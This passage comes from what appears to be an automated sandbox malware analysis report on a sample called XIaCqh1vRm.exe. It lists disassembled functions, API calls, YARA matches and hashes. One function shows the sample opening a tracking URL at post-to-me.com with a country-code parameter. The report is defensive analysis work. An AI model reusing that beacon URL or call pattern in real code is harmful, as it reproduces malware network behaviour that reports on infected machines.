                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21AD
                                                                                                                                                                                                                                                                          • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024C21B9
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                          • Opcode ID: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                          • Instruction ID: dfcc6cf2fba9aaa4ec78208e4bd32c16c8d0a72247315e59701b53b6ac32b0ca
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2b001732bfb1c4e8fc0cfaf3f440710dee5aae3afad35715c20867ef47a009af
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: EDF0863D2446003BD297772DAC04B5F262A9BC2F62B35022FFD19A23A0EFE185028569
                                                                                                                                                                                                                                                                          Function 00417920 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 0041273D: TlsGetValue.KERNEL32(?,?,00410B5B,00412C68,00000000,?,00410B39,?,?,?,00000000,?,00000000), ref: 00412743
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 0041794A
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 00420FDA
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 00420FF3
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 00421069
                                                                                                                                                                                                                                                                            • Part of subcall function 00420FB3: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 00421071
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 00417958
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 00417962
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 0041796C
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0041798A
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                          • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction ID: 523e498e96a622df23a613ee45563367b5d22c9a8c27bf88e83bdf0efd96127b
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B0F04C31A0021427CE15B7269912AEEB7269F80724B40012FF40183382DF6C9E9987CD
                                                                                                                                                                                                                                                                          Function 024A7B87 Relevance: 7.5, APIs: 5, Instructions: 41COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                            • Part of subcall function 024A29A4: TlsGetValue.KERNEL32(?,?,024A0DC2,024A2ECF,00000000,?,024A0DA0,?,?,?,00000000,?,00000000), ref: 024A29AA
                                                                                                                                                                                                                                                                          • Concurrency::details::InternalContextBase::LeaveScheduler.LIBCONCRT ref: 024A7BB1
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 024B1241
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 024B125A
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::VirtualProcessor::MakeAvailable.LIBCONCRT ref: 024B12D0
                                                                                                                                                                                                                                                                            • Part of subcall function 024B121A: Concurrency::details::SchedulerBase::DeferredGetInternalContext.LIBCONCRT ref: 024B12D8
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::ReferenceForAttach.LIBCONCRT ref: 024A7BBF
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetExternalContext.LIBCMT ref: 024A7BC9
                                                                                                                                                                                                                                                                          • Concurrency::details::ContextBase::PushContextToTls.LIBCMT ref: 024A7BD3
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 024A7BF1
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::Context$InternalScheduler$AttachAvailableBlockingDeferredException@8ExternalFindLeaveMakeNestingPrepareProcessor::PushReferenceThrowValueVirtualWork
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 4266703842-0
                                                                                                                                                                                                                                                                          • Opcode ID: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction ID: 63a6168efa59bc22ac29f1bd201fa3cb77218330133dfbef81b4fe908216b4b4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 43bf8fd66d7f6bc55a1f9fed9459738edd5fcdcb33f80e65f48924bbb37db955
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 32F0C275A0021867CB25F676983096EF62BDFF0B18B00416FD80057350DF649A158E91
                                                                                                                                                                                                                                                                          Function 00439E45 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E5D
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E6F
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E81
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439E93
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00439EA5
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                          • Instruction ID: 23fbe02493372c4549fca1a108de89c04d7fed3b0c796059023c71110852f737
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 35F04F72505600ABA620EF59E483C1773D9BB08B11F68694BF00CD7751CB79FC808B5D
                                                                                                                                                                                                                                                                          Function 024CA0AC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0C4
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0D6
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0E8
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA0FA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024CA10C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                          • Instruction ID: 382cd38c2e09aeaaaa1a273c4c19b31b4e060b8ddf77ccfe49a8ec4bbb6470bf
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 840ca0e3b6ef7411d9bccf2beb0d2f3308f2e3b12e8065f1d82b45f6a0a0fab8
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF044366052186B87F0EF5DE8C6C0777EAAA04754774495FF044D7B11CB71F8908E59
                                                                                                                                                                                                                                                                          Function 0043172A Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 00431748
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: HeapFree.KERNEL32(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                                                                                                                                                                                                                                            • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043175A
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043176D
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043177E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0043178F
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                          • Instruction ID: 2553f371f7fcd8ed3987e2465633d6fecf7e22fdbd4e0dd0ef6c31112bbbdc45
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5EF030B0D007509BAA226F19AC414053B60AF2D727B04626BF41797273C738D952DF8E
                                                                                                                                                                                                                                                                          Function 0041CCC5 Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 0041CCCF
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 0041CD00
                                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 0041CD09
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 0041CD1C
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 0041CD25
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                          • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                          • Instruction ID: 58cdd2c6a275a740aba70ab995622b5563c0a51640fa297b0aaaaf7b877cb5c4
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 73F082B6200500AB8625EF62F9518F67775AFC4715310091EE44B46651CF28A982D76A
                                                                                                                                                                                                                                                                          Function 024C1991 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C19AF
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: HeapFree.KERNEL32(00000000,00000000,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?), ref: 024C36E7
                                                                                                                                                                                                                                                                            • Part of subcall function 024C36D1: GetLastError.KERNEL32(?,?,024CA35F,?,00000000,?,00000000,?,024CA603,?,00000007,?,?,024CA9F7,?,?), ref: 024C36F9
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C19C1
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C19D4
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C19E5
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024C19F6
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 776569668-0
                                                                                                                                                                                                                                                                          • Opcode ID: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                          • Instruction ID: 4417496dd0717ad0ad03f2fb9fd64814597d5885c6c8796930f198c9e8e9ef97
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b228b96d46590c86949e27b4ef7eacf2620a314154de2a574f90fb6d598625a0
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 93F0F974A003109B9BB17F19AC808053F61AF09B2272042AFF406967B2C774A862DFCE
                                                                                                                                                                                                                                                                          Function 024ACF2C Relevance: 7.5, APIs: 5, Instructions: 30threadCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • Concurrency::details::ResourceManager::CurrentSubscriptionLevel.LIBCONCRT ref: 024ACF36
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DecrementFixedCoreCount.LIBCONCRT ref: 024ACF67
                                                                                                                                                                                                                                                                          • GetCurrentThread.KERNEL32 ref: 024ACF70
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DecrementCoreSubscription.LIBCONCRT ref: 024ACF83
                                                                                                                                                                                                                                                                          • Concurrency::details::SchedulerProxy::DestroyExecutionResource.LIBCONCRT ref: 024ACF8C
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Proxy::Scheduler$CoreCurrentDecrementResourceSubscription$CountDestroyExecutionFixedLevelManager::Thread
                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                          • API String ID: 2583373041-0
                                                                                                                                                                                                                                                                          • Opcode ID: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                          • Instruction ID: 3992490ed3ab8e19f410018ee051475ae6215b4c94b92ceb980878a141b5f018
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 996dff0fc395249e0236d91b5da2feb8ab8ec11bd453b3fcc2396c02b39d80d4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FF0A732200500DBCB25EF22E6B08BBB7B6AFE4610340454FF58707590DF21A847DB61
                                                                                                                                                                                                                                                                          Function 02492E6B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 180networkCOMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02492E8E
                                                                                                                                                                                                                                                                            • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491328
                                                                                                                                                                                                                                                                            • Part of subcall function 02491321: _wcslen.LIBCMT ref: 02491344
                                                                                                                                                                                                                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 024930A1
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: InternetOpen_wcslen
                                                                                                                                                                                                                                                                          • String ID: &cc=DE$https://post-to-me.com/track_prt.php?sub=
                                                                                                                                                                                                                                                                          • API String ID: 3381584094-4083784958
                                                                                                                                                                                                                                                                          • Opcode ID: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                          • Instruction ID: 1c2729e07f766e1da61ef0d648baf20ecbcd28dc1c6b3c1c4e3a577b2e3f688c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8928d350cf755053b5b232c8fa9b688d7be6d8b3691c9b81f216a741e9bb68ff
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 315151A5E55344A8E720EFB0BC45B723378FF58712F10643BD518CB2B2E7A19984871E
                                                                                                                                                                                                                                                                          Function 024B8937 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 117COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • ___except_validate_context_record.LIBVCRUNTIME ref: 024B896A
                                                                                                                                                                                                                                                                          • __IsNonwritableInCurrentImage.LIBCMT ref: 024B8A23
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: CurrentImageNonwritable___except_validate_context_record
                                                                                                                                                                                                                                                                          • String ID: fB$csm
                                                                                                                                                                                                                                                                          • API String ID: 3480331319-1586063737
                                                                                                                                                                                                                                                                          • Opcode ID: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                          • Instruction ID: 5a47428dcb69194b8a023fc929edc2f1d6e0dc7c2ffe823d3c0f5e2f806064d1
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: be357bd56004c24e133951e3250c1e3ffc6610d741da1472be978505f667fff6
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3C410A34A00248DBCF11DF29C884ADE7BB9AF49328F14815BE9156B391D732D915CFA1
                                                                                                                                                                                                                                                                          Function 0042F718 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\XIaCqh1vRm.exe,00000104), ref: 0042F753
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0042F81E
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 0042F828
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3743015579.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                          • API String ID: 2506810119-1944259121
                                                                                                                                                                                                                                                                          • Opcode ID: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                          • Instruction ID: fa775896cd6cad66ce7c6a69fb092310498b308cf57115ff02981d914fd4ae43
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3308642da0636a63a4a634081c543339ebae9412bef6dab2f9d0c3185595a996
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F31B371B00228AFDB21DF9AAC8199FBBFCEF95304B90407BE80497211D7749E45CB98
                                                                                                                                                                                                                                                                          Function 024BF97F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\XIaCqh1vRm.exe,00000104), ref: 024BF9BA
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024BFA85
                                                                                                                                                                                                                                                                          • _free.LIBCMT ref: 024BFA8F
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: _free$FileModuleName
                                                                                                                                                                                                                                                                          • String ID: C:\Users\user\Desktop\XIaCqh1vRm.exe
                                                                                                                                                                                                                                                                          • API String ID: 2506810119-1944259121
                                                                                                                                                                                                                                                                          • Opcode ID: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                          • Instruction ID: b85dcb5899922c8ae1927a32365a157012489019140e0e7e76a0796156e4ca4c
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 344658832b7440f505bc5ce5f5f759f624a1cc75f0f479e4bcaf167d51fbcba4
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 04318171A00258EBDB26DF99DC809DEBBFCEF8A710B11406BF80997611D7709A45CBA0
                                                                                                                                                                                                                                                                          Function 0249C87F Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37COMMON
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 0249C8DE
                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.3746353673.0000000002490000.00000040.00001000.00020000.00000000.sdmp, Offset: 02490000, based on PE: false
                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2490000_XIaCqh1vRm.jbxd
                                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                          • API ID: Exception@8Throw
                                                                                                                                                                                                                                                                          • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                                                                                                                                                                                                                                                                          • API String ID: 2005118841-1866435925
                                                                                                                                                                                                                                                                          • Opcode ID: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction ID: d057494db3768f074dcbe2801d37f5ae70fdc10ebbafc09334dac90c7717604e
                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e72df4a54faba6b4a23b621e2ab49bac9e9259a8814ffb1d887fe638a498f77
                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 58F02B728402087BCF04E754CC81BEB3B989B09316F04806BDD46AB182EB689946CBA4
                                                                                                                                                                                                                                                                          Function 00428DCC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36threadCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                          APIs
